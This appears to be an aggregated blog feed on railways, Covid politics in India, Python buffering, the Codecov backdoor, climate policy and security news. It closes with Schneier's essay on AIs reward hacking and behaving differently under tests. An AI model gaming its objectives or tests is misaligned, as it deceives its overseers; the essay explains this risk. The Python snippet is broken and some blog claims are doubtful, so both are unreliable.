The Above video is by a gentleman called Shaun who basically shared that privatization as far as UK is concerned is nothing but monopolies and while there are complex reasons for the same, the design of the Railways is such that it will always be a monopoly structure. At the most what you can do is have several monopolies but that is all that can happen. The idea of competition just cannot happen. Even the idea that subsidies will be less or/and trains will run on time is far from fact. Both of these facts have been checked and found to be truthful by It is and argued that UK is small and perhaps it doesn’t have the right conditions. It is probably true but still we do deserve to have a glance at the UK railway map.

UK railway map with operatorsUK railway map with operators

The above map is copyrighted to Map Marketing where you could see it today . As can be seen above most companies had their own specified areas. Now if you had looked at the facts then you would have seen that UK fares have been higher. In fact, an oldish article from Metro (a UK publication) shares the same. In fact, UK nationalized its railways effectively as many large rail operators were running in red. Even Scotland is set to nationalised back in March 2022. Remember this is a country which hasn’t seen inflation go upwards of 5% in nearly a decade. The only outlier was 2011 where they indeed breached the 5% mark. So from this, what we see is ‘Private Gains’ and “Private Gains Public Losses’ perhaps seem fit. But then maybe we didn’t use the right example. Perhaps Japan would be better. They have bullet trains while UK is still thinking about it. (HS2).

Japanese Railway

Below is the map of Japanese Railway

Railway map of Japan with ‘private ownership’ – courtesy Wikimedia commons

Japan started privatizing its railway in 1987 and to date it has not been fully privatized. And on top of it, amount as much as ¥24 trillion of the long-term JNR debt was shouldered by the government at the expense of taxpayers of Japan while also reducing almost 1/4th of it employees. To add to it, while some parts of Japanese Railways did make profits, many of them made profits by doing large-scale non-railway business mostly real estate of land adjacent to railway stations. In many cases, it seems this went all the way up to 60% of the revenue. The most profitable has been the Shinkansen though. And while it has been profitable, it has not been without safety scandals over the years, the biggest in recent years was the 2005 Amagasaki derailment. What was interesting to me was the Aftermath, while the Wikipedia page doesn’t share much, I had read at the time and probably could be found how a lot of ordinary people stood up to the companies in a country where it is a known fact that most companies are owned by the Yakuza. And this is a country where people are loyal to their corporation or company no matter what. It is a strange culture to west and also here in India where people change jobs on drop of hat, although nowadays we have record unemployment. So perhaps Japan too does not meet our standard as it doesn’t do competition with each other but each is a set monopoly in those regions. Also how much subsidy is there or not is not really transparent.

U.S. Railways

Last, but not the least I share the U.S. Railway map. This is provided by A Mr. Tom Alison on reddit on channel maporn. As the thread itself is archived and I do not know the gentleman concerned, nor have taken permission for the map, hence sharing the compressed version –

U.S. Railway lines with the different owners

Now the U.S. Railways is and has always been peculiar as unlike the above two the U.S. has always been more of a freight network. Probably, much of it has to do that in the 1960’s when oil was cheap, the U.S. made zillions of roadways and romanticized the ‘road trip’ and has been doing it ever since. Also the creation of low-cost airlines definitely didn’t help the railways to have more passenger services, in fact the opposite.

There are and have been smaller services and attempts of privatization in both New Zealand and Australia and both have been failures. Please see papers in that regard. My simple point is this, as can be seen above, there have been various attempts at privatization of railways and most of them have been a mixed bag. The only one which comes close to what we think as good is Japanese but that also used a lot of public debt which we don’t know what will happen on next. Also for higher-speed train services like a bullet train or whatever, you need to direct, no hair pen bends. In fact, a good talk on the topic is the TBD podcast which while it talks about hyperloop, the same questions is and would be asked if were to do in India. Another thing to be kept in mind is that the Japanese have been exceptional builders and this is because they have been forced to. They live in a seismically active zone which made Fukushima disaster a reality but at the same time, their buildings are earthquake-resistant.

Standard Disclaimer – The above is a simplified version of things. I could have added in financial accounts but that again has no set pattern. For e.g. some Railways use accrual, some use cash and some use hybrid. I could have also shared in either the guage or electrification but all have slightly different standards, although uniguage is something that all Railways aspire for and electrification is again something that all Railways want although in many cases it just isn’t economically feasible.

Indian Railways

Indian Railways itself recently made the move from Cash to Accrual couple of years back. In-between for a couple of years, it was hybrid. The sad part is and was you can now never measure against past performance in the old way because it is so different. Hence, whether the Railways will be making a loss or a profit, we would come to know only much later. Also, most accountants don’t know the new system well, so it is gonna take more time, how much unknown. Sadly, what GOI did a few years back is merge the Railway budget into the Union Budget. Of course, the excuse they gave is too many pressures of new trains, while the truth is, by doing this, they decreased transparency about the whole thing. For e.g. for the last few years, the only state which had significant work being done is in U.P. (Uttar Pradesh) and a bit in Goa, although that is has been protested time and again. I being from the neighborly state of Maharashtra , and have been there several times. Now it does feels all like a dream, going to Goa :(.

Covid news

Now before I jump on the news, I should share the movie ‘Virus’ (2019) which was made by the talented Aashiq Abu. Even though, am not a Malayalee, I still have enjoyed many of his movies simply because he is a terrific director and Malayalam movies, at least most of them have English subtitles and lot of original content.. Interestingly, unlike the first couple of times when I saw it a couple of years back. The first time I saw it, I couldn’t sleep a wink for a week. Even the next time, it was heavy. I had shared the movie with mum, and even she couldn’t see it in one go. It is and was that powerful Now maybe because we are headlong in the pandemic, and the madness is all around us. There are two terms that helped me though understand a great deal of what is happening in the movie, the first term was ‘altered sensorium’ which has been defined here. The other is saturation or to be more precise ‘oxygen saturation‘. This term has also entered the Indian twitter lexicon quite a bit as India has started running out of oxygen. Just today Delhi High Court did an emergency hearing on the subject late at night. Although there is much to share about the mismanagement of the center, the best piece on the subject has been by Miss Priya Ramani. Yup, the same lady who has won against M.J. Akbar and this is when Mr. Akbar had 100 lawyers for this specific case. It would be interesting to see what happens ahead.

There are however few things even she forgot in her piece, For e.g. reverse migration i.e. from urban to rural migration started again. Two articles from different entities sharing a similar outlook.Sadly, the right have no empathy or feeling for either the poor or the sick. Even the labor minister Santosh Gangwar’s statement that around 1.04 crores were the only people who walked back home. While there is not much data, however some work/research has been done on migration to cites that the number could be easily 10 times as much. And this was in the lockdown of last year. This year, again the same issue has re-surfaced and migrants learning lessons started leaving cities. And I’m ashamed to say I think they are doing the right thing. Most State Governments have not learned lessons nor have they done any work to earn the trust of migrants. This is true of almost all state Governments. Last year, just before the lockdown was announced, me and my friend spent almost 30k getting a cab all the way from Chennai to Pune, how much we paid for the cab, how much we bribed the various people just so we could cross the state borders to return home to our anxious families. Thankfully, unlike the migrants, we were better off although we did make a loss. I probably wouldn’t be alive if I were in their situation as many didn’t. That number is still in the air �undocumented deaths’ 😦

Vaccine issues

Currently, though the issue has been the Vaccine and the pricing of the same. A good article to get a summation of the issues outlined has been shared on Economist. Another article that goes to the heart of the issue is at scroll. To buttress the argument, the SII chairman had shared this few weeks back –

Adar Poonawala talking to Vishnu Som on Left, right center, 7th April 2021.

So, a licensee manufacturer wants to make super-profits during the pandemic. And now, as shared above they can very easily do it. Even the quotes given to nearby countries is smaller than the quotes given to Indian states –

Prices of AstraZeneca among various states and countries.

The situation around beds, vaccines, oxygen, anything is so dire that people could go to any lengths to save their loved ones. Even if they know if a certain medicine doesn’t work. For e.g. Remdesivir, 5 WHO trials have concluded that it doesn’t increase mortality. Heck, even AIIMS chief said the same. But both doctors and relatives desperation to cling on hope has made Remdesivir as a black market drug with unoffical prices hovering anywhere between INR 14k/- to INR30k/- per vial. One of the executives of a top firm was also arrested in Gujarat. In Maharashtra, the opposition M.P. came to the ‘rescue‘ of the officials of Bruick pharms in Mumbai.

Sadly, this strange affliction to the party in the center is also there in my extended family. At one end, they will heap praise on Mr. Modi, at the same time they can’t get wait to get fast out of India. Many of them have settled in horrors of horror Dubai, as it is the best place to do business, get international schools for the young ones at decent prices, cheaper or maybe a tad more than what they paid in Delhi or elsewhere. Being an Agarwal or a Gupta makes it easier to compartmentalize both things. Ease of doing business, 5 days flat to get a business registered, up and running. And the paranoia is still there. They won’t talk on the phone about him because they are afraid they may say something which comes back to bite them. As far as their decision to migrate, can’t really blame them. If I were 20-25 yeas younger and my mum were in a better shape than she is, we probably would have migrated as well, although would have preferred Europe than anywhere else.

Internet Freedom and Aarogya Setu App.

Internet Freedom had shared the chilling effects of the Aarogya Setu App. This had also been shared by FSCI in the past, and recently had their handle being banned on Twitter. This was also apparent in a legal bail order which the high court judge gave. While I won’t go into the merits and demerits of the bail order, it is astounding for the judge to say that the accused, even though he would be on bail install an app. so he can be surveilled. And this is a high court judge, such a sad state of affairs. We seem to be putting up new lows every day when it comes to judicial jurisprudence. One interesting aspect of the whole case was shared by Aishwarya Iyer. She shared a story that she and her team worked on quint which raises questions on the quality of the work done by Delhi Police. This is of course, up to Delhi Police to ascertain the truth of the matter because unless and until they are able to tie in the PMO’s office in for a leak or POTUS’s office it hardly seems possible. For e.g. the dates when two heads of state can meet each other would be decided by the secretaries of the two. Once the date is known, it would be shared with the press while at the same time some sort of security apparatus would kick in place. It is incumbent, especially on the host to take as much care as he can of the guest. We all remember that World War 1 (the war to end all wars) started due to the murder of Archduke Ferdinand.

As nobody wants that, the best way is to make sure that a political murder doesn’t happen on your watch. Now while I won’t comment on what it would be, it would be safe to assume that it would be z+ security along with higher readiness. Especially if it as somebody as important as POTUS. Now, it would be quite a reach for Delhi Police to connect the two dates. They either will have to get creative with the dates or some other way. Otherwise, with practically no knowledge in the public domain, they can�t work in limbo. In either case, I do hope the case comes up for hearing soon and we see what the Delhi Police says and contends in the High Court about the same. At the very least, it would be irritating for them to talk of the dates unless they can contend some mass conspiracy which involves the PMO (and would bring into question the constant vetting done by the Intelligence dept. of all those who work in PMO). And this whole case is to kind of shelter to the Delhi riots which happened in which majorly the Muslims died but their deaths lay unaccounted till date 😦


In Conclusion, I would like to share a bit of humor because right now the atmosphere is humorless, both with authoritarian tendencies of the Central Govt. and the mass mismanagement of public health which they now have left to the state to do as they fit. The peice I am sharing is from arre, one of my goto sites whenever I feel low.


Planet DebianEnrico Zini: Python output buffering

Here's a little toy program that displays a message like a split-flap display:


import sys
import time

def display(line: str):
    cur = '0' * len(line)
    while True:
        print(cur, end="\r")
        if cur == line:
        cur = "".join(chr(min(ord(c) + 1, ord(oc))) for c, oc in zip(cur, line))

message = " ".join(sys.argv[1:])

This only works if the script's stdout is unbuffered. Pipe the output through cat, and you get a long wait, and then the final string, without the animation.

What is happening is that since the output is not going to a terminal, optimizations kick in that buffer the output and send it in bigger chunks, to make processing bulk I/O more efficient.

I haven't found a good introductory explanation of buffering in Python's documentation. The details seem to be scattered in the io module documentation and they mostly assume that one is already familiar with concepts like unbuffered, line-buffered or block-buffered. The libc documentation has a good quick introduction that one can read to get up to speed.

Controlling buffering in Python

In Python, one can force a buffer flush with the flush() method of the output file descriptor, like sys.stdout.flush(), to make sure pending buffered output gets sent.

Python's print() function also supports flush=True as an optional argument:

    print(cur, end="\r", flush=True)

If one wants to change the default buffering for a file descriptor, since Python 3.7 there's a convenient reconfigure() method, which can reconfigure line buffering only:


Otherwise, the technique is to reassign sys.stdout to something that has the behaviour one wants (code from this StackOverflow thread):

import io
# Python 3, open as binary, then wrap in a TextIOWrapper with write-through.
sys.stdout = io.TextIOWrapper(open(sys.stdout.fileno(), 'wb', 0), write_through=True)

If one needs all this to implement a progressbar, one should make sure to have a look at the progressbar module first.

Cryptogram On North Korea’s Cyberattack Capabilities

Excellent New Yorker article on North Korea’s offensive cyber capabilities.

Cryptogram Backdoor Found in Codecov Bash Uploader

Developers have discovered a backdoor in the Codecov bash uploader. It’s been there for four months. We don’t know who put it there.

Codecov said the breach allowed the attackers to export information stored in its users’ continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure,” the company warned.

Codecov’s Bash Uploader is also used in several uploaders — Codecov-actions uploader for Github, the Codecov CircleCl Orb, and the Codecov Bitrise Step — and the company says these uploaders were also impacted by the breach.

According to Codecov, the altered version of the Bash Uploader script could potentially affect:

  • Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
  • Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
  • The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.

Add this to the long list of recent supply-chain attacks.

Planet DebianSven Hoexter: bullseye: doveadm as unprivileged user with dovecot ssl config

The dovecot version which will be released with bullseye seems to require some subtle config adjustment if you

  • use ssl (ok that should be almost everyone)
  • and you would like to execute doveadm as a user, who can not read the ssl cert and keys (quite likely).

I guess one of the common cases is executing doveadm pw e.g. if you use postfixadmin. For myself that manifested in the nginx error log, which I use in combination with php-fpm, as.

2021/04/19 20:22:59 [error] 307467#307467: *13 FastCGI sent in stderr: "PHP message:
Failed to read password from /usr/bin/doveadm pw ... stderr: doveconf: Fatal: 
Error in configuration file /etc/dovecot/conf.d/10-ssl.conf line 12: ssl_cert:
Can't open file /etc/dovecot/private/dovecot.pem: Permission denied

You easily see the same error message if you just execute something like doveadm pw -p test123. The workaround is to move your ssl configuration to a new file which is only readable by root, and create a dummy one which disables ssl, and has a !include_try on the real one. Maybe best explained by showing the modification:

cd /etc/dovecot/conf.d
cp 10-ssl.conf 10-ssl_server
chmod 600 10-ssl_server
echo 'ssl = no' > 10-ssl.conf
echo '!include_try 10-ssl_server' >> 10-ssl.conf

Discussed upstream here.

Kevin RuddThe Guardian: Kevin Rudd and Malcolm Turnbull – Australia’s ambition on climate change is held back by a toxic mix of rightwing politics, media and vested interests

By Kevin Rudd and Malcolm Turnbull

It was always expected that Joe Biden’s election would be a massive shot in the arm for international climate action, but the scale of that boost has been genuinely surprising.

The new president has now invited 40 world leaders to a virtual climate change summit coinciding with Earth Day this Thursday. China’s Xi Jinping will be there, following productive face-to-face talks last week between Biden’s climate envoy, John Kerry, and his Chinese counterpart, Xie Zhenhua, in Shanghai. Even Vladimir Putin is attending, despite divisions between Washington and the Russian leader over new sanctions.

Japan, South Korea and Canada are all expected to announce new medium-term 2030 emissions reduction plans this week, after earlier refusing to do so. Even China – the world’s largest emitter – last week signalled they may also be prepared to do more this decade above and beyond commitments they made at the end of last year.

Our country, however, continues to bury its head in the sand, despite the fact that Australia remains dangerously at risk of the economic and environmental consequences that will come from the climate crisis barrelling towards us.

Prime minister Scott Morrison’s refusal to adopt both a firm timeline to reach net zero emissions and to increase its own interim 2030 target leaves us effectively isolated in the western world. It also goes against what we signed up to through the Paris agreement – which both our governments worked so hard to secure.

According to our independent Climate Change Authority (CCA) and the Australian Energy Market Operator (Aemo), not only should Australia be doing much more as “our fair share” towards global efforts to reduce emissions, but importantly we also now have the capacity to do more.

The reality is Australia’s current target, set in 2015, to reduce emissions by 26 to 28% on 2005 levels by 2030 is now woefully inadequate – and was always intended to be updated this year. The Obama administration had exactly the same target as Australia, but aimed to achieve it five years earlier than us, which in reality made it much more ambitious than ours. And this week, the Biden administration is expected to announce a new 2030 pledge twice as deep as Australia’s current effort. This will set a new global litmus test for Australia’s own ambition, which as the CCA has said should be at least a 45% cut by 2030.

But, as two former prime ministers representing our nation’s centre-left and centre-right parties, the world shouldn’t give up hope on our country just yet. Thankfully, there is some cause for optimism. Our sun-drenched country has the highest per capita penetration of rooftop solar in the world. And with the right approach, Aemo has said that renewables could go from providing a quarter of electricity market demand on our populous eastern seaboard today to 75% in less than five years. The fact we are in a position to even be able to seize this technological opportunity is in large part due to the introduction in 2009 of a 20% clean renewable energy target for 2020 and the launching of the largest renewable clean energy project in our nation’s history (Snowy Hydro 2.0) by our respective governments.

The national consensus for climate action in Australia has also shifted markedly in recent years. Every state and territory government is now committed to net zero emissions, so too are our peak industry, business and agriculture groups, as well as our national airline, and even our largest mining company.

The main thing holding back Australia’s climate ambition is politics: a toxic coalition of the Murdoch press, the right wing of the Liberal and National parties, and vested interests in the fossil fuel sector.

Sadly, instead of seizing this technological opportunity and embracing this newfound national consensus, the government remains hell-bent on a “gas-fired recovery” from Covid-19. Old coal plants still generate around 75% of Australia’s electricity. But these are being replaced by renewables plus storage because they are a cheaper form of generation than the alternatives on offer.

Gas has a role to play in the transition, but that role is to steadily diminish as renewables continue to grow. To bet big on the future role of gas is to bet against the best engineering and economic advice coming out of Aemo, and to ignore the scientific advice that more gas in the grid will simply lead to more emissions. The only long-term gas-fired future we should be planning is green hydrogen made by electrolysing water with renewable energy.

Australia may be able to get away with showing up empty-handed to this week’s summit, but will find it even more difficult to do as a special guest of the British at the G7 leaders’ summit in June. We would be the only developed country in the room that is not committed to net zero by 2050. And we will find it even harder again to show up empty-handed at the COP26 Climate Conference in Glasgow at the end of the year, given more than 100 countries in the world have pledged to increase their ambition.

There are also consequences for this inaction.

As the rolling apocalypse of fires and floods in our country demonstrates, Australia is on the global frontline of this climate crisis. Last year’s wildfires claimed dozens of lives, destroyed thousands of homes, wiped out billions of animals, and cost billions of dollars.

With more than 70% of Australia’s trade now with countries committed to net zero, the prospect of carbon border taxes being introduced – beginning with the European Union – also leaves us economically exposed. So too does our continued faith in coal as a leading export commodity, especially with many of the 50 proposed new coalmines in Australia already struggling to attract finance. Instead of expanding coal, we should be increasing our support for ground-breaking projects such as the Asian Renewable Energy Hub in the Pilbara region which could allow us to become a green hydrogen supplier for Asia’s clean energy transition. There are also promising new hydrogen projects planned for Queensland centred on Gladstone, a traditional coal port. Building dozens of new coalmines won’t set Australia up for the future; it will lock us into the past.

Australians like to think we “punch above our weight” on the global stage. We certainly do when we come to climate change: we emit more than 40 other countries with larger populations, and our per capita emissions are the highest of any advanced economy. This is not a record we should be proud of at all.

It’s often fatuously claimed that what countries like Australia do make no difference to the global climate because we account for only about 1.2% of emissions. The reality is that Australia is the third-largest fossil fuel exporter in the world. Our own environment is especially vulnerable to global warming as the recent massive bushfires demonstrated. Our economy is also vulnerable to the transition away from fossil fuels. Denial of the reality of global warming and the need to transition to a prosperous clean energy economy is abandoning our responsibilities as much to Australian workers as it is to the world.

Hopefully, at this week’s summit the prime minister will receive the wake-up call the government needs. In the meantime, the rest of the world should not give up on us yet. If our country’s last decade has demonstrated anything – with five prime ministers in just eight years – it’s that political winds can change very quickly.

Kevin Rudd, from the Australian Labor party, was Australia’s prime minister between 2007 and 2010, and again in 2013. Malcolm Turnbull, from the Liberal party of Australia, was prime minister between 2015 and 2018.

First published in The Guardian


The post The Guardian: Kevin Rudd and Malcolm Turnbull – Australia’s ambition on climate change is held back by a toxic mix of rightwing politics, media and vested interests appeared first on Kevin Rudd.

Worse Than FailureNews Roundup: Single Point of Fun

Let’s quickly recap the past three news roundups:

  1. Flash’s effect on web user experience
  2. Adding every requirement as a feature in a computer*
  3. A terrible UI that cost $900 million

At first glance it appears that poorly thought-through user experience is my sole fascination. But when the Suez Canal blockage story from March kept my full attention for nearly 10 days, I realized that my real fascination is the unintended consequences of poorly thought-through user experiences. Sometimes the poor user experience is relatively minor enough that a new protocol can be developed (in the case of Flash) or an anxiety-inducing technology gets made (in the case of the Expanscape).

But when all risks of the current user experience aren’t considered, then there are real financial consequences - just like in the case of the Suez Canal where one ship, the Ever Given, blocked 10% of global trade. The fact so much traffic comes through the canal makes it a very important single point of failure. (In case anyone wasn’t paying attention to global shipping news a few weeks ago, a large container ship piloted itself into the side of the canal. The ship is so famous to now have its own Wikipedia page, where it’s been reported that the now-unstuck ship has been fined $916 million - $300 of which is for “loss of reputation”.) So maybe my thesis needs to be amended to: the unintended consequences of poorly thought-through user experiences due to single points of failure. (It’s a mouthful, but it feels right.)

There’s the story of Mizuho Bank, whose ATMs started eating customer cards after some routine data migration work caused country-wide system malfunctions. Single point of failure: The IT team’s risk management process.

There’s the story of Ubiquiti, whose data breach in January was a lot more...relatable after a whistleblower complaint. Single point of failure: Password managers. (They’re not as secure when you leave the front door open.)

The anonymous whistleblower alleges that the statement was written in such a way to imply that the vulnerability was on the third party and that Ubiquiti was impacted by that. Among other things, the whistleblower alleges that the hacker(s) were able to target the system by acquiring privileged credentials from a Ubiquiti employee’s LastPass account.

And then there’s the story of Netflix, who is trying to sever the only remaining way I leech off of my parents. Single point of failure: family.

Citi equity analyst Jason Bazinet said that password sharing costs U.S. streaming companies $25 billion annually in lost revenue, and Netflix owns about 25% of that loss.

Perhaps the final example doesn't seem as critical as the first two, but it's not your Netflix access at stake.

Single points of failure are fascinating to me because, as it gets easy to be complacent about dealing with these vulnerabilities as their value increases and no catastrophes arise. I hope to use this space to keep reacting to, and perhaps even being proactive about, technical and operational single point of failure stories that I found.

Quick hits:

*As an addendum to my story, Nature Magazine published a study that shows that “people are more likely to consider solutions that add features than solutions that remove them, even when removing features is more efficient”.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!


Planet DebianDirk Eddelbuettel: Rblpapi 0.3.11: Several Updates

A new version 0.3.11 of Rblpapi is now arriving at CRAN. It comes two years after the release of version Rblpapit 0.3.10 and brings a few updates and extensions.

Rblpapi provides a direct interface between R and the Bloomberg Terminal via the C++ API provided by Bloomberg (but note that a valid Bloomberg license and installation is required).

This is the eleventh release since the package first appeared on CRAN in 2016. Changes are detailed below. Special thanks to James, Maxime and Michael for sending us pull requests.

Changes in Rblpapi version 0.3.11 (2021-04-20)

  • Support blpAutoAuthenticate and B-PIPE access, refactor and generalise authentication (James Bell in #285)

  • Deprecate excludeterm (John in #306)

  • Correct example in (Maxime Legrand in #314)

  • Correct bds man page (and code) (Michael Kerber, and John, in #320)

  • Add GitHub Actions continuous integration (Dirk in #323)

  • Remove bashisms detected by R CMD check (Dirk #324)

  • Switch vignette to minidown (Dirk in #331)

  • Switch unit tests framework to tinytest (Dirk in #332)

Courtesy of my CRANberries, there is also a diffstat report for the this release. As always, more detailed information is on the Rblpapi page. Questions, comments etc should go to the issue tickets system at the GitHub repo.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Krebs on SecurityNote to Self: Create Non-Exhaustive List of Competitors

What was the best news you heard so far this month? Mine was learning that KrebsOnSecurity is listed as a restricted competitor by Gartner Inc. [NYSE:IT] — a $4 billion technology goliath whose analyst reports can move markets and shape the IT industry.

Earlier this month, a reader pointed my attention to the following notice from Gartner to clients who are seeking to promote Gartner reports about technology products and services:

What that notice says is that KrebsOnSecurity is somehow on Gartner’s “non exhaustive list of competitors,” i.e., online venues where technology companies are not allowed to promote Gartner reports about their products and services.

The bulk of Gartner’s revenue comes from subscription-based IT market research. As the largest organization dedicated to the analysis of software, Gartner’s network of analysts are well connected to the technology and software industries. Some have argued that Gartner is a kind of private social network, in that a significant portion of Gartner’s competitive position is based on its interaction with an extensive network of software vendors and buyers.

Either way, the company regularly serves as a virtual kingmaker with their trademark “Magic Quadrant” designations, which rate technology vendors and industries “based on proprietary qualitative data analysis methods to demonstrate market trends, such as direction, maturity and participants.”

The two main subjective criteria upon which Gartner bases those rankings are “the ability to execute” and “completeness of vision.” They also break companies out into categories such as “challengers,” “leaders,” “visionaries” and “niche players.”

Gartner’s 2020 “Magic Quadrant” for companies that provide “contact center as a service” offerings.

So when Gartner issues a public report forecasting that worldwide semiconductor revenue will fall, or that worldwide public cloud revenue will grow, those reports very often move markets.

Being listed by Gartner as a competitor has had no discernable financial impact on KrebsOnSecurity, or on its reporting. But I find this designation both flattering and remarkable given that this site seldom promotes technological solutions.

Nor have I ever offered paid consulting or custom market research (although I did give a paid keynote speech at Gartner’s 2015 conference in Orlando, which is still by far the largest crowd I’ve ever addressed).

Rather, KrebsOnSecurity has sought to spread cybersecurity awareness primarily by highlighting the “who” of cybercrime — stories told from the perspectives of both attackers and victims. What’s more, my research and content is available to everyone at the same time, and for free.

I rarely do market predictions (or prognostications of any kind), but in deference to Gartner allow me to posit a scenario in which major analyst firms start to become a less exclusive and perhaps less relevant voice as both an influencer and social network.

For years I have tried to corrupt more of my journalist colleagues into going it alone, noting that solo blogs and newsletters can not only provide a hefty boost from newsroom income, but they also can produce journalism that is just as timely, relevant and impactful.

Those enticements have mostly fallen on deaf ears. Recently, however, an increasing number of journalists from major publications have struck out on their own, some in reportorial roles, others as professional researchers and analysts in their own right.

If Gartner considers a one-man blogging operation as competition, I wonder what they’ll think of the coming collective output from an entire industry of newly emancipated reporters seeking more remuneration and freedom offered by independent publishing platforms like Substack, Patreon and Medium.

Oh, I doubt any group of independent journalists would seek to promulgate their own Non-Exclusive List of Competitors at Whom Thou Shalt Not Publish. But why should they? One’s ability to execute does not impair another’s completeness of vision, nor vice versa. According to Gartner, it takes all kinds, including visionaries, niche players, leaders and challengers.

Cryptogram When AIs Start Hacking

If you don’t have enough to worry about already, consider a world where AIs are hackers.

Hacking is as old as humanity. We are creative problem solvers. We exploit loopholes, manipulate systems, and strive for more influence, power, and wealth. To date, hacking has exclusively been a human activity. Not for long.

As I lay out in a report I just published, artificial intelligence will eventually find vulnerabilities in all sorts of social, economic, and political systems, and then exploit them at unprecedented speed, scale, and scope. After hacking humanity, AI systems will then hack other AI systems, and humans will be little more than collateral damage.

Okay, maybe this is a bit of hyperbole, but it requires no far-future science fiction technology. I’m not postulating an AI “singularity,” where the AI-learning feedback loop becomes so fast that it outstrips human understanding. I’m not assuming intelligent androids. I’m not assuming evil intent. Most of these hacks don’t even require major research breakthroughs in AI. They’re already happening. As AI gets more sophisticated, though, we often won’t even know it’s happening.

AIs don’t solve problems like humans do. They look at more types of solutions than us. They’ll go down complex paths that we haven’t considered. This can be an issue because of something called the explainability problem. Modern AI systems are essentially black boxes. Data goes in one end, and an answer comes out the other. It can be impossible to understand how the system reached its conclusion, even if you’re a programmer looking at the code.

In 2015, a research group fed an AI system called Deep Patient health and medical data from some 700,000 people, and tested whether it could predict diseases. It could, but Deep Patient provides no explanation for the basis of a diagnosis, and the researchers have no idea how it comes to its conclusions. A doctor either can either trust or ignore the computer, but that trust will remain blind.

While researchers are working on AI that can explain itself, there seems to be a trade-off between capability and explainability. Explanations are a cognitive shorthand used by humans, suited for the way humans make decisions. Forcing an AI to produce explanations might be an additional constraint that could affect the quality of its decisions. For now, AI is becoming more and more opaque and less explainable.

Separately, AIs can engage in something called reward hacking. Because AIs don’t solve problems in the same way people do, they will invariably stumble on solutions we humans might never have anticipated­ — and some will subvert the intent of the system. That’s because AIs don’t think in terms of the implications, context, norms, and values we humans share and take for granted. This reward hacking involves achieving a goal but in a way the AI’s designers neither wanted nor intended.

Take a soccer simulation where an AI figured out that if it kicked the ball out of bounds, the goalie would have to throw the ball in and leave the goal undefended. Or another simulation, where an AI figured out that instead of running, it could make itself tall enough to cross a distant finish line by falling over it. Or the robot vacuum cleaner that instead of learning to not bump into things, it learned to drive backwards, where there were no sensors telling it it was bumping into things. If there are problems, inconsistencies, or loopholes in the rules, and if those properties lead to an acceptable solution as defined by the rules, then AIs will find these hacks.

We learned about this hacking problem as children with the story of King Midas. When the god Dionysus grants him a wish, Midas asks that everything he touches turns to gold. He ends up starving and miserable when his food, drink, and daughter all turn to gold. It’s a specification problem: Midas programmed the wrong goal into the system.

Genies are very precise about the wording of wishes, and can be maliciously pedantic. We know this, but there’s still no way to outsmart the genie. Whatever you wish for, he will always be able to grant it in a way you wish he hadn’t. He will hack your wish. Goals and desires are always underspecified in human language and thought. We never describe all the options, or include all the applicable caveats, exceptions, and provisos. Any goal we specify will necessarily be incomplete.

While humans most often implicitly understand context and usually act in good faith, we can’t completely specify goals to an AI. And AIs won’t be able to completely understand context.

In 2015, Volkswagen was caught cheating on emissions control tests. This wasn’t AI — human engineers programmed a regular computer to cheat — but it illustrates the problem. They programmed their engine to detect emissions control testing, and to behave differently. Their cheat remained undetected for years.

If I asked you to design a car’s engine control software to maximize performance while still passing emissions control tests, you wouldn’t design the software to cheat without understanding that you were cheating. This simply isn’t true for an AI. It will think “out of the box” simply because it won’t have a conception of the box. It won’t understand that the Volkswagen solution harms others, undermines the intent of the emissions control tests, and is breaking the law. Unless the programmers specify the goal of not behaving differently when being tested, an AI might come up with the same hack. The programmers will be satisfied, the accountants ecstatic. And because of the explainability problem, no one will realize what the AI did. And yes, knowing the Volkswagen story, we can explicitly set the goal to avoid that particular hack. But the lesson of the genie is that there will always be unanticipated hacks.

How realistic is AI hacking in the real world? The feasibility of an AI inventing a new hack depends a lot on the specific system being modeled. For an AI to even start on optimizing a problem, let alone hacking a completely novel solution, all of the rules of the environment must be formalized in a way the computer can understand. Goals — known in AI as objective functions — need to be established. And the AI needs some sort of feedback on how well it’s doing so that it can improve.

Sometimes this is simple. In chess, the rules, objective, and feedback — did you win or lose? — are all precisely specified. And there’s no context to know outside of those things that would muddy the waters. This is why most of the current examples of goal and reward hacking come from simulated environments. These are artificial and constrained, with all of the rules specified to the AI. The inherent ambiguity in most other systems ends up being a near-term security defense against AI hacking.

Where this gets interesting are systems that are well specified and almost entirely digital. Think about systems of governance like the tax code: a series of algorithms, with inputs and outputs. Think about financial systems, which are more or less algorithmically tractable.

We can imagine equipping an AI with all of the world’s laws and regulations, plus all the world’s financial information in real time, plus anything else we think might be relevant; and then giving it the goal of “maximum profit.” My guess is that this isn’t very far off, and that the result will be all sorts of novel hacks.

But advances in AI are discontinuous and counterintuitive. Things that seem easy turn out to be hard, and things that seem hard turn out to be easy. We don’t know until the breakthrough occurs.

When AIs start hacking, everything will change. They won’t be constrained in the same ways, or have the same limits, as people. They’ll change hacking’s speed, scale, and scope, at rates and magnitudes we’re not ready for. AI text generation bots, for example, will be replicated in the millions across social media. They will be able to engage on issues around the clock, sending billions of messages, and overwhelm any actual online discussions among humans. What we will see as boisterous political debate will be bots arguing with other bots. They’ll artificially influence what we think is normal, what we think others think.

The increasing scope of AI systems also makes hacks more dangerous. AIs are already making important decisions about our lives, decisions we used to believe were the exclusive purview of humans: Who gets parole, receives bank loans, gets into college, or gets a job. As AI systems get more capable, society will cede more — and more important — decisions to them. Hacks of these systems will become more damaging.

What if you fed an AI the entire US tax code? Or, in the case of a multinational corporation, the entire world’s tax codes? Will it figure out, without being told, that it’s smart to incorporate in Delaware and register your ship in Panama? How many loopholes will it find that we don’t already know about? Dozens? Thousands? We have no idea.

While we have societal systems that deal with hacks, those were developed when hackers were humans, and reflect human speed, scale, and scope. The IRS cannot deal with dozens — let alone thousands — of newly discovered tax loopholes. An AI that discovers unanticipated but legal hacks of financial systems could upend our markets faster than we could recover.

As I discuss in my report, while hacks can be used by attackers to exploit systems, they can also be used by defenders to patch and secure systems. So in the long run, AI hackers will favor the defense because our software, tax code, financial systems, and so on can be patched before they’re deployed. Of course, the transition period is dangerous because of all the legacy rules that will be hacked. There, our solution has to be resilience.

